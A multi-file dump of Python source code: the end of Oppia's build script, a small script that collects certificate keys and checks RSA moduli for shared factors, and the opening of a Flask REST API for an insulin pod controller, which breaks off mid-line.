list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
minified_third_party_js_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
minified_third_party_css_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
third_party_js_filepath, minified_third_party_js_filepath)
_minify(third_party_css_filepath, minified_third_party_css_filepath)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(third_party_js_filepath)
safe_delete_file(third_party_css_filepath)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
webfonts_dir = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(third_party_js_filepath)
with python_utils.open_file(
third_party_js_filepath, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(third_party_css_filepath)
with python_utils.open_file(
third_party_css_filepath, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(webfonts_dir)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], webfonts_dir))
def build_using_webpack(config_path):
"""Execute webpack build process. This takes all TypeScript files we have in
/templates and generates JS bundles according to the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
Args:
config_path: str. Webpack config to be used for building.
"""
python_utils.PRINT('Building webpack')
cmd = '%s %s --config %s' % (
common.NODE_BIN_PATH, WEBPACK_FILE, config_path)
subprocess.check_call(cmd, shell=True)
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
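# For illustration: should_file_be_built('core/fooSpec.js') and
# should_file_be_built('core/foo_test.py') are False, while
# should_file_be_built('core/foo.js') is True.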
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
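# A minimal sketch (hypothetical path) of how this pairs with _insert_hash
# during the build:
#
#     file_hash = generate_md5_hash('assets/images/logo.png')
#     hashed_path = _insert_hash('assets/images/logo.png', file_hash)
#     # e.g. 'assets/images/logo.<32-character hex digest>.png'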
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
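# For illustration: given {'images/logo.png': 'abc', 'core/main.py': 'def'},
# filter_hashes returns {'/images/logo.png': 'abc'}, because only paths that
# match FILEPATHS_PROVIDED_TO_FRONTEND are exposed to the frontend.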
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespace, interpolate paths in the HTML to include
hashes, and save the edited file in the target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
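# A minimal usage sketch for the batching helper above (hypothetical paths):
#
#     tasks = collections.deque()
#     for name in ('a.png', 'b.png'):
#         tasks.append(threading.Thread(
#             target=safe_copy_file, args=('assets/' + name, 'build/' + name)))
#     _execute_tasks(tasks, batch_size=2)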
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
'Scanning directory %s to remove deleted files' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is on Windows-Style, while the path in
# hashes is in posix style, we need to convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
be built or that are already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
file_extensions_not_to_track = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in file_extensions_not_to_track):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError. The hash dict is empty.
ValueError. Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError. The filename does not contain hash.
KeyError. The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belong to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
hash_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for hash_dir in hash_dirs:
hashes.update(get_file_hashes(hash_dir))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
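# Note the ordering above: hashes.json is written first and then hashed
# itself, so its own digest can be checked later in _verify_hashes().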
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
copy_input_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
copy_output_dirs = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(copy_input_dirs) == len(copy_output_dirs)
for i in python_utils.RANGE(len(copy_input_dirs)):
safe_delete_directory_tree(copy_output_dirs[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
copy_input_dirs[i], copy_output_dirs[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(copy_output_dirs, hashes)
source_dirs_for_assets = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_assets = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(source_dirs_for_assets, output_dirs_for_assets)
source_dirs_for_third_party = [THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_third_party = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
source_dirs_for_third_party, output_dirs_for_third_party)
source_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
output_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
source_dirs_for_webpack, output_dirs_for_webpack)
source_dirs_for_extensions = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_extensions = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_extensions, output_dirs_for_extensions)
source_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_templates, output_dirs_for_templates)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
if options.maintenance_mode and not options.prod_env:
raise Exception(
'maintenance_mode should only be enabled in prod build.')
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only:
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
return
else:
raise Exception(
'minify_third_party_libs_only should not be '
'set in non-prod env.')
modify_constants(
prod_env=options.prod_env,
emulator_mode=not options.deploy_mode,
maintenance_mode=options.maintenance_mode)
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
hashes = generate_hashes()
if options.deparallelize_terser:
if options.source_maps:
raise Exception(
'source_maps flag shouldn\'t be used with '
'deparallelize_terser flag.')
build_using_webpack(WEBPACK_TERSER_CONFIG)
elif options.source_maps:
build_using_webpack(WEBPACK_PROD_SOURCE_MAPS_CONFIG)
else:
build_using_webpack(WEBPACK_PROD_CONFIG)
generate_app_yaml(
deploy_mode=options.deploy_mode,
maintenance_mode=options.maintenance_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
main.py | import time, math
import os, sys
import numpy as np
from multiprocessing import Process, Lock
import cert_information as ci
dir = "./"+sys.argv[1].strip()
[subfolders] = os.walk(dir)
start = time.time()
for file in subfolders[2]:
domains = []
lock = Lock()
p = 10 # Number of worker processes
arq = open(dir+'/'+file, "r")
for domain in arq:
domains.append(domain.split(","))
arq.close()
if len(domains) > 0:
n = int(math.ceil(len(domains)/p))
Domains = [domains[i * n:(i + 1) * n] for i in range((len(domains) + n - 1) // n )]
domains.clear()
for i in range(len(Domains)):
ts = ci.CertificateSanityCheck(Domains[i], lock)
# Pass the bound method itself; the original called it inline, which ran
# the check in the parent and handed Process a None target. process_cert()
# is assumed to take no arguments, matching the original call.
Process(target=ts.process_cert).start()
print('Sorting and removing duplicate items...\nThis process may take some time.')
os.system("sort modulus_file.txt | uniq -u > modulus.txt")
os.system("sort ec_public_key_file.txt | uniq -u > ec_public_key.txt")
end = time.time()
print("Time used: ",end - start)
ts.ffmethod()
ts.calc_gcd()
|
restapi.py | #!/usr/bin/python3
from threading import Thread
import signal
import base64
from uuid import getnode as get_mac
from decimal import *
from threading import Lock
from Crypto.Cipher import AES
import simplejson as json
from flask import Flask, request, send_from_directory
from datetime import datetime
import time
from podcomm.pdm import Pdm, PdmLock
from podcomm.pod import Pod
from podcomm.pr_rileylink import RileyLink
from podcomm.definitions import *
from logging import FileHandler
from batt_check import SpiBatteryVoltageChecker
g_oldest_diff = None
g_time_diffs = []
g_key = None
g_pod = None
g_pdm = None
g_deny = False
g_tokens = []
g_token_lock = Lock()
g_battery_checker = SpiBatteryVoltageChecker()
app = Flask(__name__, static_url_path="/")
configureLogging()
logger = getLogger(with_console=True)
get_packet_logger(with_console=True)
class RestApiException(Exception):
def __init__(self, msg="Unknown"):
self.error_message = msg
def __str__(self):
return self.error_message
def _set_pod(pod):
global g_pod
global g_pdm
g_pod = pod
g_pod.path = DATA_PATH + POD_FILE + POD_FILE_SUFFIX
g_pod.path_db = DATA_PATH + POD_FILE + POD_DB_SUFFIX
g_pod.Save()
if g_pdm is not None:
g_pdm.stop_radio()
g_pdm = None
def _get_pod():
global g_pod
try:
if g_pod is None:
if os.path.exists(DATA_PATH + POD_FILE + POD_FILE_SUFFIX):
g_pod = Pod.Load(DATA_PATH + POD_FILE + POD_FILE_SUFFIX, DATA_PATH + POD_FILE + POD_DB_SUFFIX)
else:
g_pod = Pod()
g_pod.path = DATA_PATH + POD_FILE + POD_FILE_SUFFIX
g_pod.path_db = DATA_PATH + POD_FILE + POD_DB_SUFFIX
g_pod.Save()
return g_pod
except:
logger.exception("Error while loading pod")
return None
def _get_pdm():
global g_pdm
try:
if g_pdm is None:
g_pdm = Pdm(_get_pod())
return g_pdm
except:
logger.exception("Error while creating pdm instance")
return None
def _flush_handlers(logger):
for handler in logger.handlers:
if isinstance(handler, MemoryHandler):
handler.flush()
if isinstance(handler, FileHandler):
handler.flush()
handler.close()
def _archive_pod():
global g_pod
global g_pdm
try:
g_pod = None
g_pdm = None
archive_name = None
archive_suffix = datetime.utcnow().strftime("_%Y%m%d_%H%M%S")
if os.path.isfile(DATA_PATH + POD_FILE + POD_FILE_SUFFIX):
archive_name = DATA_PATH + POD_FILE + archive_suffix + POD_FILE_SUFFIX
os.rename(DATA_PATH + POD_FILE + POD_FILE_SUFFIX,
archive_name)
if os.path.isfile(DATA_PATH + POD_FILE + POD_DB_SUFFIX):
os.rename(DATA_PATH + POD_FILE + POD_DB_SUFFIX,
DATA_PATH + POD_FILE + archive_suffix + POD_DB_SUFFIX)
_flush_handlers(getLogger())
_flush_handlers(get_packet_logger())
if os.path.isfile(DATA_PATH + OMNIPY_PACKET_LOGFILE + LOGFILE_SUFFIX):
os.rename(DATA_PATH + OMNIPY_PACKET_LOGFILE + LOGFILE_SUFFIX,
